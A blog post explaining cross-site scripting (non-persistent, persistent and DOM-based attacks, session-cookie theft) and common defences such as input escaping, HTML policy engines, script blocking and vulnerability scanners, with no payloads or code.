Security Review on Cross-site scripting (XSS)

Cross-site scripting (XSS) is a security vulnerability in web applications which allows client side scripts to be injected into web pages to attack users who view these web pages (similar to SQL injections in my last blog post). Recently, XSS attacks have surpassed buffer overflow attacks to become the most popular security vulnerability. Over 80% of all website attacks on the internet are XSS exploits and researchers claim that up to 68% of all websites on the internet are vulnerable to this type of attack. Facebook, MySpace, Twitter, and other top websites on the internet today have been compromised by XSS attacks.

XSS exploits focus on attacking the client side and are very effective at bypassing client side security mechanisms. There are two types of XSS attacks: non-persistent and persistent. I will discuss the traditional non-persistent and persistent attacks as well as the newer DOM-based vulnerabilities exploited by XSS.

The most common type of XSS attack is a non-persistent one. Typically in this attack, a website will present a submission form to a user where they are allowed to type text and the server will immediately process the text and display it on a resulting page. If the user crafts HTML code properly and the server does not properly escape these HTML control characters, an XSS vulnerability has been found and can be exploited by the attacker. An example of this attack is typing a string of text into a search engine, which will process the text and usually display it on the resulting page. This example will not be of harm to anyone but the user who typed in the HTML code, but if they had injected this code into a URL link to a valid website with an XSS vulnerability and had somebody else click the link, they could steal the victim's information. If the victim is currently logged into an account on the valid website, the hacker could gain full access to their account session by stealing their session cookie.

Persistent XSS attacks are more severe and indirect than non-persistent attacks. When a server takes input from a user and permanently stores that submitted information on a web page (such as a Facebook profile or forum online where users are allowed to input HTML segments), users who visit that web page are subject to an attack if the website did not properly handle the escaping of HTML control characters. The attacker could steal the victims cookie and gain full access to their session.

In recent years, Web 2.0 applications which can dynamically generate web page information without users having to hit the refresh button in their browsers have been subject to DOM-based XSS vulnerabilities. DOM stands for "Document Object Model" and is basically a way to interact with objects in HTML. JavaScript is a client side scripting language for websites. Asynchronous JavaScript (known as Ajax) can retrieve data asynchronously from the server in the background of the web page by using the HTML object known as XmlHttpRequest which can make HTML requests and server queries without updating the web page the user is currently on. Attackers can exploit DOM-based XSS vulnerabilities to essentially gain access to this object and steal information.

There are a few steps that users and website developers can take to defend themselves from XSS attacks. The first thing is that website developers can make sure to properly escape HTML input from users. If the website's function is to allow users to input HTML (such as for formatting their profile page on MySpace) then the website developers must run this untrusted HTML input through an HTML policy engine to check for XSS. Another thing that website developers can do to avoid their user's accounts and information being stolen through XSS attacks is to attach the IP address of the user logged in to their session cookie. This way, if an attacker successfully steals a session cookie from a logged in user on a website through XSS, they will not be able to use the cookie unless they are within the same network as the victim.

One thing users can do to prevent themselves from XSS is to disable the use of scripts in their browsers. They may also add lists of trusted or untrusted domains into a list in their browser where they would like scripting enabled/disabled depending on the domain they are visiting. This approach is not entirely useful, however, due to the fact that many websites across the internet require the use of scripts to function properly.

Looking into the future, scanning technologies are emerging which scan websites for possible XSS attacks and allow website developers to patch the holes before they are exploited by attackers. These scanning technologies are not perfect and cannot find every single vulnerability in the website.

If you are a website developer, it is important to know the risks and understand how XSS works so that you can help secure your website as much as possible. Set up a sandbox website and test your skills! If you are completely new to XSS you can read up about some basics HERE. If you are familiar with XSS you should go HERE to learn about some more advanced tricks of XSS.

Sources:
http://www.ihtb.org/security/xss_hacking_exposed.txt
http://en.wikipedia.org/wiki/Cross-site_scripting
http://ha.ckers.org/xss.html